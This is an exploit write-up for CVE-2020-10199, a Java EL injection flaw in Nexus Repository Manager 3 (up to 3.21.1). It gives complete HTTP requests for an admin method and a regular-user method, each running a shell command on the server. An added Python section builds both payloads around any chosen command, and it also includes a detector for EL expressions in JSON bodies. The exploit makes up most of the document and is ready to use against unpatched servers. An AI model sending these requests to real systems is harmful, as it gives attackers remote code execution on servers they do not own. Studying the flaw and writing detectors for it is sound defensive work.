## CVE-2020-10199 Nexus Repository Manager 3 RCE

**Affected versions**:

- <= 3.21.1: all Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1. Fixed in Nexus Repository Manager OSS/Pro 3.21.2.

**Prerequisite:** log in with any account, then call the API as shown below. The vulnerability is Java EL injection: the attacker-controlled string is evaluated as an EL expression on the server, so the `$\A{...}` value in each request runs the embedded `Runtime.exec` call.

- Method 1 (requires administrator privileges)

1. Create a `CleanupPolicy` whose `format` field carries the EL expression:

```http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 381
Pragma: no-cache
Cache-Control: no-cache
Sec-Fetch-Dest: empty
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.047908797369389244
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
Connection: close

{"action":"cleanup_CleanupPolicy","method":"create","data":[{"name":"threedr3am","format":"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}","notes":"222","mode":"delete","lastBlobUpdatedEnabled":false,"lastDownloadedEnabled":false,"releaseTypeEnabled":false,"regexEnabled":false,"criteria":{}}],"type":"rpc","tid":33}
```

2. Create a repository that references the policy by name in `cleanup.policyNames`:

```http
POST /service/rest/beta/repositories/apt/hosted HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 342
Pragma: no-cache
Cache-Control: no-cache
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.047908797369389244
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
Connection: close

{
  "name": "interna1l",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true,
    "writePolicy": "allow_once"
  },
  "cleanup": {
    "policyNames": ["threedr3am"]
  },
  "apt": {
    "distribution": "bionic"
  },
  "aptSigning": {
    "keypair": "string",
    "passphrase": "string"
  }
}
```

- Method 2 (regular user privileges): a single request, with the EL expression placed in `group.memberNames` of a group repository

```http
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=396e7352-f76c-4bdd-9833-98d7990dca3b
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}"]
  }
}
```
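As an added example (not part of the original post and not code from threedr3am's repository), the following Python covers both methods above: it builds the two request bodies from a parameterised shell command, and it shows the detection side, a walker over a decoded JSON body that flags any string value containing an EL opener. The policy/repository names and the command are placeholders; the `getMethods()[6]` index is copied from the page's payload and is JDK-specific, since reflection does not guarantee method order.

```python
import json
import re

# Added example, not from the original post or the PoC repository.
# All inputs here are constructed locally; nothing is sent over the network.


def el_payload(command: str) -> str:
    """The Java EL expression used on this page, wrapping a shell command.

    getMethods()[6] is Runtime.getRuntime() on the author's JVM; the index
    depends on the JDK, because reflection does not guarantee method order.
    """
    return (
        "$\\A{''.getClass().forName('java.lang.Runtime')"
        ".getMethods()[6].invoke(null).exec('" + command + "')}"
    )


def cleanup_policy_body(policy_name: str, command: str) -> str:
    """Method 1, step 1: ExtDirect body creating a CleanupPolicy whose
    'format' field carries the EL expression."""
    return json.dumps({
        "action": "cleanup_CleanupPolicy",
        "method": "create",
        "data": [{
            "name": policy_name,
            "format": el_payload(command),
            "notes": "",
            "mode": "delete",
            "lastBlobUpdatedEnabled": False,
            "lastDownloadedEnabled": False,
            "releaseTypeEnabled": False,
            "regexEnabled": False,
            "criteria": {},
        }],
        "type": "rpc",
        "tid": 1,
    })


def group_repo_body(repo_name: str, command: str) -> str:
    """Method 2: REST body for /service/rest/beta/repositories/go/group with
    the EL expression as a (non-existent) member repository name."""
    return json.dumps({
        "name": repo_name,
        "online": True,
        "storage": {"blobStoreName": "default", "strictContentTypeValidation": True},
        "group": {"memberNames": [el_payload(command)]},
    })


# EL openers "${" and "#{", plus the "$\A{" variant used on this page.
# Applied to decoded string values, i.e. after JSON unescaping.
EL_OPENER = re.compile(r"[$#](?:\\[A-Za-z])?\{")


def find_el_in_json(body: str) -> list:
    """Return [(json_path, value)] for each string in a JSON request body
    that contains an EL opener. Walking the decoded document rather than
    grepping raw bytes means JSON escaping of the backslash ("$\\\\A{" on
    the wire) cannot hide the term from the check."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")
        elif isinstance(node, str) and EL_OPENER.search(node):
            findings.append((path, node))

    walk(json.loads(body), "$")
    return findings


if __name__ == "__main__":
    for body in (cleanup_policy_body("demo", "id"), group_repo_body("internal", "id")):
        print(body)
        print("  flagged:", find_el_in_json(body))
    # Constructed benign request with a real member name: nothing flagged.
    print(find_el_in_json('{"name":"internal","group":{"memberNames":["maven-releases"]}}'))
```

Note the wire form: `json.dumps` writes the value as `$\\A{...}`, which is exactly what the bodies on this page show, while the server sees `$\A{...}` after JSON decoding; a detection rule that greps the raw body for `$\A{` would miss it.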

> [@threedr3am](https://github.com/threedr3am/learnjavabug/tree/master/nexus/CVE-2020-10199)
